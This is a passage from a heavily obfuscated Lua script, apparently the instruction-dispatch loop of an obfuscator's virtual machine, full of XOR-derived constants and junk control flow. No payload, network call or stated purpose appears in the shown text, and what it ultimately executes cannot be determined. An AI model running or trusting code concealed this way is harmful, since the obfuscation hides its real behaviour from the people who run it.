n[e]=nil;end;end;elseif(a<=((f[607931906])or((function(e)f[607931906]=t(t(t(((e)-89630)-881588,959210),946349),843590);return(f[607931906]);end)(t(388156038,389551225)))))then if(a<=((f[7742553])or((function(e)f[7742553]=(t(t(t(t(e,26518),600518),630264),893593))-725944;return(f[7742553]);end)(t(207418536,c[61679461])))))then if(a<=t(21877328,21877360))then if(a<=30)then n[e[l]]=B(D[e[o]],(nil),i);elseif(a>h(61162758,1708090))then if(n[e[l]]>e[d])then b=e[o];end;elseif(a<h(564342319,1028164))then local l=e[l];local x=e[o];local d=50*(e[d]-1);local o=n[l];local e=0;for x=l+1,x do o[d+e+1]=n[l+(x-l)];e=e+1;end;end;elseif(a<=h(649001966,1866488))then if(a==h(t(268424003,c[61679461]),t(45577043,44917627)))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][e[o]]=n[e[d]];e=e[x];e=e[x];elseif(a<=((f[572924522])or(c[284191218](t(578334805,c[253204386]),t,f,572924522))))then n[e[l]]=e[o]+n[e[d]];end;elseif(a==((f[142799412])or(c["ISSg7L8l"](t(663090426,664100008),t,f,142799412))))then local x=n[e[d]];if(x)then n[e[l]]=x;b=e[o];end;elseif(a<=36)then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local a;local h;local f;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=0,33 do if t(2444,1613+x,892)>=446 then if t(5276,6789+x,1598)<799 then if t(9465,3490+x,2542)>=1271 then else end else if t(4566,6949+x,1094)>=547 then f=e[a];else h=e[o];end end else if t(7628,5216+x,3468)<1734 then if t(8149,1647+x,3762)>1881 then else end else if t(3434,2796+x,2336)>=1168 then n[f]=h;else a=l;end end end end n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local a;local h;local f;local E;local m;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for x=0,31 do if t(9060,4049+x,968)>=484 then if t(8301,1748+x,392)<196 then h=l;if t(1959,6830+x,1934)<967 then f=e[o];else end else if t(9348,9926+x,1762)<=881 then m=e[h];else end n[m]=E;end else if t(5684,1881+x,2038)>=1019 then if t(2444,5730+x,3080)>1540 then b=e[o];else a=i;end else if t(4265,2649+x,1050)<=525 then else E=a[f];end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];end;elseif(a<=t(677301541,c[1966943]))then if(a<=t(577840317,c[253204386]))then if(a>h(t(817345911,819371558),493393))then n[e[l]][e[o]]=e[d];elseif(a<h(744039523,1451517))then local l=e[l];local d=e[d];local x=l+2;local l=({n[l](n[l+1],n[x]);});for e=1,d do n[x+e]=l[e];end;local l=l[1];if(l)then n[x]=l;b=e[o];end;end;elseif(a>((f[970418141])or(c[562354862](t(97573576,97867814),t,f,970418141))))then e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=u[e[o]];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local l=n[e[o]];n[t+1]=l;n[t]=l[e[d]];e=e[x];e=e[x];elseif(a<40)then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a<=42)then if(a>((f[896548090])or((function(e)f[896548090]=(t((((e)-463037)-358744)-551462,608338))-344047;return(f[896548090]);end)(t(879077915,876959390)))))then local l=e[l];E=l+p-1;for e=0,p do n[l+e]=g[e];end;for e=E+1,r do n[e]=nil;end;elseif(a<h(169158980,233495))then local l=e[l];local x={n[l](n[l+1]);};local o=e[d];local e=0;for l=l,o do e=e+1;n[l]=x[e];end;for e=o+1,r do n[e]=nil;end;end;elseif(a>((f[531726629])or((function(e)f[531726629]=t(((e)-663829)-177384,67240);return(f[531726629]);end)(t(248857159,c[369230860])))))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];elseif(a<h(t(976612264,c["dd5ryo"]),t(335026621,334380110)))then if(e[l]>n[e[d]])then b=e[o];end;end;elseif(a<=((f[762791626])or((function(e)f[762791626]=t(t(((t(e,962176))-466750)-417062,392061),461491);return(f[762791626]);end)(t(851647804,c[596954169])))))then if(a<=((f[668234727])or((function(e)f[668234727]=t(((t((e)-754209,719866))-424951)-832917,658628);return(f[668234727]);end)(t(900642955,898498341)))))then if(a<=h(61162758,1708076))then n[e[l]][n[e[o]]]=n[e[d]];elseif(a==((f[129237217])or((function(e)f[129237217]=(t(t(t(e,966458),574839),149005))-730368;return(f[129237217]);end)(t(46119198,45129840)))))then n[e[l]]=n[e[o]]+n[e[d]];elseif(a<=t(454614268,c["ck1ee9L4Bn"]))then e=e[x];n[e[l]]=y(256);e=e[x];n[e[l]]=y(256);e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]];e=e[x];local d=e[l];local c,t=m(n[d](n[d+1]));E=t+d-1;local t=0;for e=d,E do t=t+1;n[e]=c[t];end;e=e[x];local d=e[l];local c,t=m(n[d](s(n,d+1,E)));E=t+d-1;local t=0;for e=d,E do t=t+1;n[e]=c[t];end;for e=E+1,r do n[e]=nil;end;e=e[x];local d=e[l];n[d]=n[d](s(n,d+1,E));for e=d+1,E do n[e]=nil;end;e=e[x];n[e[l]]=n[e[o]];e=e[x];e=e[x];end;elseif(a<=h(348968146,944931))then if(a>48)then local e=e[l];n[e]=n[e](n[e+1]);for e=e+1,r do n[e]=nil;end;elseif(a<49)then local e=e[l];n[e](n[1+e]);for e=e,r do n[e]=nil;end;end;elseif(a>((f[485740996])or((function(e)f[485740996]=(t(t(e,143183),104842))-14672;return(f[485740996]);end)(t(988047220,988276787)))))then local l=e[l];local d=n[l+2];local x=n[l]+d;n[l]=x;if(d>0)then if(x<=n[l+1])then b=e[o];n[l+3]=x;end;elseif(x>=n[l+1])then b=e[o];n[l+3]=x;end;elseif(a<h(t(196380314,288418415),124377))then n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a<=((f[241459066])or(c[349974814](t(453877968,c['ck1ee9L4Bn']),t,f,241459066))))then if(a<=h(744039523,1451500))then if(a>((f[286605382])or(c[232752059](t(568297897,566761066),t,f,286605382))))then local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];local d=e[l];do return n[d](s(n,d+1,e[o]))end;e=e[x];local l=e[l];do return s(n,l,E);end;e=e[x];e=e[x];elseif(a<h(t(996361013,c[125643710]),233722))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];local u;local b;local h;local a;local f;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=0,27 do if t(1034,7127+x,1924)<962 then if t(4785,8326+x,1072)<=536 then if t(5273,9231+x,1244)>622 then else f=e[b];end n[f]=a;else u=i;if t(5587,2207+x,3646)<=1823 then local x=e[o];local o=n[x];for e=x+1,e[d]do o=o..n[e];end;n[e[l]]=o;else b=l;end end else if t(7847,8505+x,1340)>=670 then if t(9438,9162+x,2006)>1003 then a=u[h];else h=e[o];end else if t(9452,7186+x,2262)<1131 then else end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];local a;local h;local f;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((1==e)and n or-n)or c*n)%l return c end for x=1,28 do if t(1339,8187+x,3444)>1722 then h=e[o];if t(9082,8439+x,1176)>588 then if t(3671,2668+x,504)<=252 then else end else if t(3894,7273+x,2576)<1288 then else f=e[a];end n[f]=h;end else if t(3487,1404+x,3174)>1587 then if t(6597,8182+x,3640)<1820 then a=l;else end else if t(8341,9571+x,3026)>=1513 then else end end end end n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];end;elseif(a==54)then n[e[l]]=y(e[o]);elseif(a<=((f[416103011])or((function(e)f[416103011]=t(t((t(t(e,755634),655625))-93903,909541),857590);return(f[416103011]);end)(t(894018406,c[388999018])))))then e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];local t=e[l];n[t]=n[t](n[t+1]);for e=t+1,r do n[e]=nil;end;e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=e[o];e=e[x];e=e[x];end;elseif(a<=h(t(439774197,808960721),t(596081641,c['PbWozrvBn'])))then if(a>56)then local l=e[l];local o=n[e[o]];n[l+1]=o;n[l]=o[n[e[d]]];elseif(a<57)then local l=e[l];n[l]=0+(n[l]);n[l+1]=0+(n[l+1]);n[l+2]=0+(n[l+2]);local x=n[l];local d=n[l+2];if(d>0)then if(x>n[l+1])then b=e[o];else n[l+3]=x;end;elseif(x<n[l+1])then b=e[o];else n[l+3]=x;end;end;elseif(a==h(649001966,1866496))then local e=e[l];n[e]=n[e]();elseif(a<=((f[906673159])or((function(e)f[906673159]=(t((e)-132879,259937))-103183;return(f[906673159]);end)(t(820712411,821000417)))))then n[e[l]]=n[e[o]]-e[d];end;elseif(a<=t(207263260,c[61679461]))then if(a<=((f[715041264])or((function(e)f[715041264]=t(((e)-851683)-636160,718663);return(f[715041264]);end)(t(565784236,c[925637430])))))then if(a<=66)then if(a<=((f[320805856])or(c[432036195](t(702757310,c[425693847]),t,f,320805856))))then if(a<=t(370859997,c[563461517]))then e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=u[e[o]];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local l=e[l];local o=n[e[o]];n[l+1]=o;n[l]=o[e[d]];e=e[x];e=e[x];elseif(a==t(369848760,369848709))then local x=e[o];local o=n[x];for e=x+1,e[d]do o=o..n[e];end;n[e[l]]=o;elseif(a<=((f[60042192])or(c[249714393](t(849624561,851300668),t,f,60042192))))then n[e[l]]=n[e[o]]/e[d];end;elseif(a<=h(719921999,637663))then if(a==t(57023792,57023759))then if(e[l]>=n[e[d]])then b=e[o];end;elseif(a<=64)then local l=e[l];local x={n[l](s(n,l+1,E));};local o=e[d];local e=0;for l=l,o do e=e+1;n[l]=x[e];end;for e=o+1,r do n[e]=nil;end;end;elseif(a==h(t(690847000,c.WIdu1oU),t(511198759,c[165995577])))then local l=e[l];local o=n[e[o]];n[l+1]=o;n[l]=o[e[d]];elseif(a<=h(t(395018563,55006609),944944))then n[e[l]]=n[e[o]][e[d]];e=e[x];local i;local f;local a;local c=0;local function t(e,n,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=1,31 do if t(3778,6010+x,2436)<1218 then if t(1561,5263+x,1028)<514 then if t(9752,5443+x,3004)>=1502 then i=l;else local x=e[o];local o=n[x];for e=x+1,e[d]do o=o..n[e];end;n[e[l]]=o;end f=e[o];else if t(4515,2422+x,2980)>=1490 then else end end else a=e[i];if t(8851,5974+x,294)<147 then if t(9383,1097+x,1572)>786 then else end else if t(5274,5445+x,912)<=456 then n[a]=f;else end end end end n[e[l]]=(e[o]~=0);e=e[x];local l=e[l];n[l](s(n,l+1,e[o]));for e=l+1,r do n[e]=nil;end;e=e[x];e=e[x];end;elseif(a<=70)then if(a<=t(168514455,168514515))then if(a==h(t(929879951,493715115),1211626))then local e=e[l];do return n[e](s(n,e+1,E))end;elseif(a<=h(t(169607273,749927303),1866390))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a==h(t(206200343,642512691),t(796431677,795535829)))then n[e[l]]=e[o]/e[d];elseif(a<=t(248265041,c['gqO0c']))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a<=h(662495255,1149013))then if(a==71)then for e=e[l],e[o]do n[e]=(nil);end;elseif(a<=((f[278939649])or(c[666369648](t(941088200,940246630),t,f,278939649))))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];local a;local m;local E;local f;local h;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and-n or n)or c*n)%l return c end for x=1,34 do if t(6429,7817+x,3356)<1678 then if t(3476,1432+x,3724)>=1862 then if t(3132,1998+x,2294)<=1147 then E=e[o];else a=i;end else if t(7102,7133+x,888)<=444 then n[h]=f;else h=e[m];end end m=l;else if t(2859,1298+x,1068)>534 then if t(9754,6528+x,3584)>1792 then n[e[l]]=#n[e[o]];else n[e[l]]=i[e[o]];end else if t(2431,9170+x,1832)>=916 then f=a[E];else if(n[e[l]]==e[d])then b=b+1;else b=e[o];end;end end end end n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];local t=e[l];local o=n[e[o]];n[t+1]=o;n[t]=o[e[d]];e=e[x];local l=e[l];n[l](n[1+l]);for e=l,r do n[e]=nil;end;e=e[x];e=e[x];end;elseif(a==73)then n[e[l]]=n[e[o]]*n[e[d]];elseif(a<=t(570729248,570729322))then u[e[o]]=n[e[l]];end;elseif(a<=t(368892917,c[764945195]))then if(a<=((f[247548912])or((function(e)f[247548912]=((t(t(e,489976),281194))-607406)-606606;return(f[247548912]);end)(t(572791755,c["ohZWzer"])))))then if(a<=h(t(953381651,c[764945195]),988842))then do return(n[e[l]]);end;elseif(a>h(29441446,458442))then local l=e[l];local x=n[l];local e,o=0,50*(e[d]-1);for l=l+1,E,1 do x[o+e+1]=n[l];e=e+1;end;elseif(a<((f[321630442])or(c[384957349](t(186948235,c[229559301]),t,f,321630442))))then local l=e[l];local x=({n[l](s(n,l+1,e[o]))});local o=e[d];local e=0;for l=l,o,1 do e=e+1;n[l]=x[e];end;for e=o+1,r do n[e]=nil;end;end;elseif(a<=79)then if(a==t(554320142,554320192))then local e=e[l];n[e]=n[e](s(n,e+1,E));for e=e+1,E do n[e]=nil;end;elseif(a<=((f[820325248])or(c.ukHup(t(140015007,c[289978309]),t,f,820325248))))then local c;local a;local f;local x=0;local function t(e,n,l)e=(x+e)%3 x=((e~=0)and x+((e<2)and-n or n)or x*n)%l return x end for x=2,32 do if t(6521,8428+x,608)>304 then if t(6778,6918+x,3586)>1793 then if t(3990,3981+x,1572)<786 then else n[e[l]]=e[o]-e[d];end else if t(9038,5321+x,1800)<=900 then c=l;else end end else if t(1827,7754+x,1656)>=828 then a=e[o];if t(2758,9061+x,3996)>=1998 then f=e[c];else end else if t(1648,5755+x,2496)>1248 then else end end n[f]=a;end end end;elseif(a>h(t(716071,30134401),t(596900347,c.PbWozrvBn)))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]][e[o]]=n[e[d]];e=e[x];e=e[x];elseif(a<h(t(605729359,1005780144),t(244910345,244014900)))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];end;elseif(a<=t(100318597,100318672))then if(a<=h(t(866174882,c.zOlbw),t(249502148,c[369230860])))then if(a>h(t(252365863,85976419),t(200972354,200870045)))then n[e[l]]=(not(n[e[o]]));elseif(a<h(348968146,944897))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];end;elseif(a==t(868347047,c["zOlbw"]))then local x=D[e[o]];local c=e[w];local o={};local t=Q({},{__index=function(n,e)local e=o[e];return(e[1][e[2]]);end,__newindex=function(l,e,n)local e=o[e];e[1][e[2]]=n;end;});for l=1,e[d],1 do local e=c[l];if(e[0]==0)then o[l-1]=({n,e[1]});else o[l-1]=({u,e[1]});end;A[#A+1]=o;end;n[e[l]]=B(x,t,i);elseif(a<=((f[490763896])or((function(e)f[490763896]=t(t(t((t(e,610843))-621023,755187),639096),517239);return(f[490763896]);end)(t(510625784,c[165995577])))))then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local t=e[l];local c=n[e[o]];n[t+1]=c;n[t]=c[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];end;elseif(a<=h(t(952579461,c[165995577]),1866403))then if(a>((f[875350205])or(c[307271135](t(278178687,277954381),t,f,875350205))))then do return;end;elseif(a<h(t(206187400,648218823),637674))then n[e[l]]=n[e[o]]+e[d];end;elseif(a>88)then n[e[l]]=n[e[o]]-n[e[d]];elseif(a<t(159413516,c[862112943]))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local l=e[l];n[l](s(n,l+1,e[o]));for e=l+1,r do n[e]=nil;end;e=e[x];e=e[x];end;elseif(a<=((f[277383531])or(c[668794168](t(606722993,607189125),t,f,277383531))))then if(a<=((f[448615194])or(c.E2mruo(t(372162027,c[812419154]),t,f,448615194))))then if(a<=((f[748928343])or(c[709137567](t(919595819,c.hRqzXYmx),t,f,748928343))))then if(a<=((f[795507977])or((function(e)f[795507977]=t((t((e)-493525,215637))-523192,856806);return(f[795507977]);end)(t(345144983,c[690511759])))))then n[e[l]]=u[e[o]];elseif(a>h(t(862593572,665253622),t(248968702,c[369230860])))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local c=e[l];local t=n[e[o]];n[c+1]=t;n[c]=t[e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t]=n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=e[o];e=e[x];n[e[l]]=(e[o]~=0);e=e[x];local t=e[l];n[t](s(n,t+1,e[o]));for e=t+1,r do n[e]=nil;end;e=e[x];n[e[l]]=i[e[o]];e=e[x];n[e[l]]=e[o];e=e[x];local t=e[l];n[t](n[1+t]);for e=t,r do n[e]=nil;end;e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];e=e[x];elseif(a<h(t(883362114,1051860998),t(829563492,829534849)))then n[e[l]][e[o]]=n[e[d]];end;elseif(a<=t(745136107,c[762654841]))then if(a==h(169158980,233698))then n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]][e[o]]=e[d];e=e[x];e=e[x];elseif(a<=94)then e=e[x];n[e[l]]=u[e[o]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];n[e[l]]=n[e[o]][e[d]];e=e[x];local u;local f;local h;local b;local a;local c=0;local function t(n,e,l)e=(c+e)%3 c=((e~=0)and c+((e<2)and n or-n)or c*n)%l return c end for x=0,28 do if t(4534,2047+x,1606)<=803 then if t(5106,8972+x,3994)>1997 then if t(5816,2487+x,2050)<=1025 then else b=u[h];end a=e[f];else n[a]=b;if t(1000,9287+x,1790)<895 then else end end else if t(4047,8201+x,3520)>1760 then if t(8552,1635+x,3160)>1580 then else u=i;end else f=l;if t(4313,3168+x,2054)>=1027 then else 